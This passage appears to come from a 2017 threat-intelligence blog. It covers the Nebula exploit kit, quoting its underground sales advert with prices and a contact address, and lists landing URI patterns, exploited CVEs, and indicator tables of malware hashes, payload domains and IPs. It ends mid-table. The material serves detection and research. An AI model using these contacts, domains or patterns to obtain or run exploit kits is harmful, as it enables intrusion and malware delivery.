panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.Help with installation is no charge.------------------------------------------Sample:VT linkMD5 f3862c311c67cb027a06d4272b680a3bSHA1 0ff1584eec4fc5c72439d94e8cee922703c44049SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08fEmerging Threats rules :2024531 || ET TROJAN MSIL/CoalaBot CnC ActivityRead More:August in November: New Information Stealer Hits the Scene - 2016-12-07 - ProofpointBye Empire, Hello Nebula Exploit Kit.2017-03-02T22:17:00+01:002017-03-02T22:17:00+01:00https://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-gv17fFl2krQ/WLhO3BEj9lI/AAAAAAAAGGI/JiBVi4N3JI8q0VigcJ4aAhjQAitMbYDAgCLcB/s1600/2017-03-02_16h56_30.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://4.bp.blogspot.com/-gv17fFl2krQ/WLhO3BEj9lI/AAAAAAAAGGI/JiBVi4N3JI8q0VigcJ4aAhjQAitMbYDAgCLcB/s1600/2017-03-02_16h56_30.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Nebula Logo</td></tr></tbody></table><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-hjZ1ZP25cp0/WLh2fWWL5qI/AAAAAAAAGHc/v3kWOVYvbzIW8rNVULNVEmK4CPafAMVhQCLcB/s1600/2017-03-02_19h45_47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-hjZ1ZP25cp0/WLh2fWWL5qI/AAAAAAAAGHc/v3kWOVYvbzIW8rNVULNVEmK4CPafAMVhQCLcB/s1600/2017-03-02_19h45_47.png" /></a></div><br /><br /><br />While <a href="http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html">Empire</a> (RIG-E) disappeared at the end of December after 4 months of activity<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-ubl8LWi1iN8/WLhvNlS48wI/AAAAAAAAGHI/5VhT3XXFeQ4R1LD-RSKsb__Sf2zQtfHnQCLcB/s1600/2017-03-02_19h12_12.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://1.bp.blogspot.com/-ubl8LWi1iN8/WLhvNlS48wI/AAAAAAAAGHI/5VhT3XXFeQ4R1LD-RSKsb__Sf2zQtfHnQCLcB/s640/2017-03-02_19h12_12.png" width="521" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Illustration of the last month of witnessed Activity for Empire</td></tr></tbody></table>on 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.<br /><br /><i><span style="color: #666666;">------</span></i><br /><span style="background-color: white; font-family: "arial" , sans-serif; font-size: 12.8px;"><i><span style="color: #666666;">Selling EK Nebula</span></i></span><br /><span style="background-color: white; font-family: "arial" , sans-serif; font-size: 12.8px;"><i><span style="color: #666666;">------</span></i></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>Nebula Exploit kit</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i><br /></i></span></span><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>Features:</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Automatic domain scanning and generating (99% FUD)</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-API rotator domains</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Exploit rate tested in different traffic go up 8/19%</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-knock rate tested whit popular botnet go 30/70%</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Clean and modern user interface</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Custom domains & server ( add & point your own domains coming soon...)</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Unlimited flows & files</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Scan file & domains</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Multiple payload file types supported (exe , dll , js, vbs)</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Multi. geo flow (split loads by country & file)</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-Public stats by file & flow</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-latest CVE-2016 CVE-2017</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>-custom features just ask support</i></span></span><br /><i><span style="color: #666666;"><br /></span></i><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>Subscriptions:</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>24h - 100$</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>7d - 600$</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>31d - 2000$</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i><br /></i></span></span><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>Jabber - nebula-support@xmpp.jp</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i><br /></i></span></span><span style="color: #666666; font-family: "arial" , sans-serif;"><i><span style="background-color: white; font-size: 12.8px;"></span></i></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>Offering free tests to trusted users </i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i>------</i></span></span><br /><span style="color: #666666; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><i><br /></i></span></span><span style="color: #222222; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;">In same thread some screenshots were shared by a customer.</span></span><br /><span style="color: #222222; font-family: "arial" , sans-serif;"><span style="font-size: 12.8px;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-eW0NmnNEDkI/WLhQi3YDROI/AAAAAAAAGGU/bkMyOBirqhARjHsU0IFTyYr1Q_7z0oEbwCLcB/s1600/2017-03-02_17h03_51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://2.bp.blogspot.com/-eW0NmnNEDkI/WLhQi3YDROI/AAAAAAAAGGU/bkMyOBirqhARjHsU0IFTyYr1Q_7z0oEbwCLcB/s320/2017-03-02_17h03_51.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UiN-Iolbm4c/WLhQixE1JxI/AAAAAAAAGGQ/gfCI1PqukysA5qh83Kt6CtL2hbS78H7bwCLcB/s1600/2017-03-02_17h03_30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://1.bp.blogspot.com/-UiN-Iolbm4c/WLhQixE1JxI/AAAAAAAAGGQ/gfCI1PqukysA5qh83Kt6CtL2hbS78H7bwCLcB/s320/2017-03-02_17h03_30.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-IYmba63QcPo/WLhQnwg34MI/AAAAAAAAGGY/heqiiQBviI07WLCcB31I836dusf21OiKgCLcB/s1600/2017-03-02_17h02_31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://4.bp.blogspot.com/-IYmba63QcPo/WLhQnwg34MI/AAAAAAAAGGY/heqiiQBviI07WLCcB31I836dusf21OiKgCLcB/s320/2017-03-02_17h02_31.png" width="320" /></a></div><div><br /></div><div><br /></div><div><br /></div><div>Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown.</div><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-vkG_GsrrBJE/WLhTbNirEdI/AAAAAAAAGGk/TWYbZi6gdhsoheeJvYxDGGaK9Qx8AWSAQCLcB/s1600/2017-03-02_17h16_01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="70" src="https://3.bp.blogspot.com/-vkG_GsrrBJE/WLhTbNirEdI/AAAAAAAAGGk/TWYbZi6gdhsoheeJvYxDGGaK9Qx8AWSAQCLcB/s640/2017-03-02_17h16_01.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">"GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17<br />Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) </td><td class="tr-caption"><br /></td></tr></tbody></table><div><div>This Sundown variation was not so much different from the mainstream one.</div><div>No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.</div><div><br /></div><div>Digging more it appeared it was featuring an Internal TDS (as Empire). </div><div>The same exact call would give you a different payload in France or in United Kingdom/Japan.</div></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-9K7FgFUYtUQ/WLhULGfqRZI/AAAAAAAAGGo/Y6Ce8WcySMMaYXRv4YZPp39P6h99ZXQHgCLcB/s1600/2017-03-02_17h19_28.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="72" src="https://2.bp.blogspot.com/-9K7FgFUYtUQ/WLhULGfqRZI/AAAAAAAAGGo/Y6Ce8WcySMMaYXRv4YZPp39P6h99ZXQHgCLcB/s640/2017-03-02_17h19_28.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">"GamiNook" traffic with geo in France - 2017-02-17<br />Identicall payload call gives you Gootkit instead of Pitou<br />Payload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)</td></tr></tbody></table><div>Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.</div><div><br /></div><div><br /></div><div>At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the traffic illustrated in the advert thread is quite inline with the one captured in France).</div><div><br /></div><div>So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.</div><div><br /></div><div>The following days i saw other actor sending traffic to this EK.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-vSMR87gND2w/WLhY5t4gARI/AAAAAAAAGG4/_TGaWRM1EB4-Lz_TJIsK4PN47387Gj9mQCLcB/s1600/2017-03-02_17h36_27.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://4.bp.blogspot.com/-vSMR87gND2w/WLhY5t4gARI/AAAAAAAAGG4/_TGaWRM1EB4-Lz_TJIsK4PN47387Gj9mQCLcB/s1600/2017-03-02_17h36_27.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Taxonomy tied to Nebula Activity in MISP - 2017-03-02</td></tr></tbody></table><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Mfe5TVXGVW0/WLj7wwpssaI/AAAAAAAAGH8/63YZmNEPgwYoMza30tGnmMeDNpYw6UdYwCLcB/s1600/2017-03-02_19h22_30.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="384" src="https://1.bp.blogspot.com/-Mfe5TVXGVW0/WLj7wwpssaI/AAAAAAAAGH8/63YZmNEPgwYoMza30tGnmMeDNpYw6UdYwCLcB/s640/2017-03-02_19h22_30.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Taxonomy tied to GamiNook traffic activity, EK and resulting payload</td></tr></tbody></table><br /></div><div>Today URI pattern changed from this morning :</div><div><br /></div><div><div><span style="font-size: xx-small;">/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM</span></div><div><span style="font-size: xx-small;">/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB</span></div><div><span style="font-size: xx-small;">/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM</span></div><div><span style="font-size: xx-small;">/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN</span></div><div><span style="font-size: xx-small;">/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA</span></div><div><span style="font-size: xx-small;">/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf</span></div><div><span style="font-size: xx-small;">/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB</span></div><div><span style="font-size: xx-small;">/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM</span></div><div><span style="font-size: xx-small;">/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf</span></div><div><span style="font-size: xx-small;">/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM</span></div><div><span style="font-size: xx-small;">/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM</span></div><div><span style="font-size: xx-small;">/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN</span></div><div><br /></div></div><div>(which is Sundown/Beps without the index.php) to</div><div><span style="font-size: xx-small;"><br /></span></div><div><div><span style="font-size: xx-small;">/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8</span></div><div><span style="font-size: xx-small;">/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU</span></div><div><span style="font-size: xx-small;">/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4</span></div><div><span style="font-size: xx-small;">/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT</span></div><div><span style="font-size: xx-small;">/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1</span></div><div><span style="font-size: xx-small;">/2003/01/27/exchange-monday-wilderness</span></div><div><span style="font-size: xx-small;">/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c</span></div><div><span style="font-size: xx-small;">/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7</span></div><div><span style="font-size: xx-small;">/2006/08/05/fur-copper-shark</span></div><div><span style="font-size: xx-small;">/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7</span></div><div><span style="font-size: xx-small;">/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h</span></div><div><span style="font-size: xx-small;">/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi</span></div><div><span style="font-size: xx-small;">/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1</span></div><div><span style="font-size: xx-small;">/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14</span></div><div><span style="font-size: xx-small;">/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18</span></div><div><span style="font-size: xx-small;">/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361</span></div><div><span style="font-size: xx-small;">/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20</span></div><div><span style="font-size: xx-small;">/2012/04/22/present-measure-physical-examination</span></div></div><div><span style="font-size: xx-small;"><br /></span></div><div><span style="font-size: xx-small;"><br /></span></div><div><span style="font-size: xx-small;"><br /></span></div>(for those who would like to build their regexp, more pattern available here : <a href="https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI">https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI</a> )<br /><div><span style="font-size: xx-small;"><br /></span></div><div><span style="font-size: xx-small;"><br /></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-IJG_H2u-hqE/WLiBE0mGx-I/AAAAAAAAGHs/LG80p8NbkuoPrNFPHzbiZ-HnKlU0Jz5uwCLcB/s1600/2017-03-02_20h29_56.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="78" src="https://1.bp.blogspot.com/-IJG_H2u-hqE/WLiBE0mGx-I/AAAAAAAAGHs/LG80p8NbkuoPrNFPHzbiZ-HnKlU0Jz5uwCLcB/s640/2017-03-02_20h29_56.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02</td></tr></tbody></table><div><br /></div><div>This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.</div><div><br /></div><div><b><u>Exploits</u></b>: </div><div>CVE-2014-6332 + CVE-2015-0016<br />CVE-2013-2551</div><div>CVE-2016-0189 godmode</div><div>CVE-2015-8651</div><div>CVE-2015-7645</div><div>CVE-2016-4117</div><div><div><br /></div><div><b><u>Files: </u></b> <a href="https://files.dontneedcoffee.com/index.php/s/2Q89MWjo1JQhMlj">Nebula_2017-03-02</a> (2 fiddler - password is malware)</div></div><div><br /></div><div><b><u>Acknowledgement :</u></b></div><div>Thanks <a href="https://twitter.com/jspchc">Joseph C Chen</a> and <a href="https://twitter.com/brooks_li">Brooks Li</a> <em>(<a href="http://blog.trendmicro.com/">Trendmicro</a>)</em>, <a href="https://twitter.com/francruar">Frank Ruiz</a> (<a href="https://www.fox-it.com/intell/">Fox-IT InTELL</a>) and Andrew Komarov ( <a href="https://www.infoarmor.com/">InfoArmor Inc.</a> ) for the help on different aspect of this post.</div><div><br /></div><div><b><u>Edit:</u></b><br />2017-03-03 Corrected some CVE id + not all payload are in clear<br />---</div><div>Some IOCs</div><div><br /></div><div><table style="border-collapse: collapse; border-spacing: 0px; box-sizing: border-box; color: #24292e; display: block; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px !important; overflow: auto; width: 888px;"><thead style="box-sizing: border-box;"><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">Date</th><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">Sha256</th><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">Comment</th></tr></thead><tbody style="box-sizing: border-box;"><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/17</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Flash Exploit (CVE-2016-4117)</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/27</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2ecc</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Flash Exploit (CVE-2016-4117)</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/17</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">67d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/17</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">04fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41c</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Flash Exploit (CVE-2015-8651 Sample seen previously in Sundown)</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/17</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315c</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Pitou</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/17</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">6fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Gootkit</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/22</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">1a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64b</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Ramnit</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">6764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4a</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">DiamondFox</span></td></tr></tbody></table></div><div><br /></div><div><br /></div><div><table style="border-collapse: collapse; border-spacing: 0px; box-sizing: border-box; color: #24292e; display: block; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 0px !important; margin-top: 0px !important; overflow: auto; width: 888px;"><thead style="box-sizing: border-box;"><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">Date</th><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">Domain</th><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">IP</th><th style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;">Comment</th></tr></thead><tbody style="box-sizing: border-box;"><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/17</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">tci.nhnph.com</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">188.209.49.135</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula Payload Domain</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/22</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">gnd.lplwp.com</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">188.209.49.135</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula Payload Domain</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/24</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">qcl.ylk8.xyz</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">188.209.49.23</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula Payload Domain</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">hmn.losssubwayquilt.pw</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula Payload Domain</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span 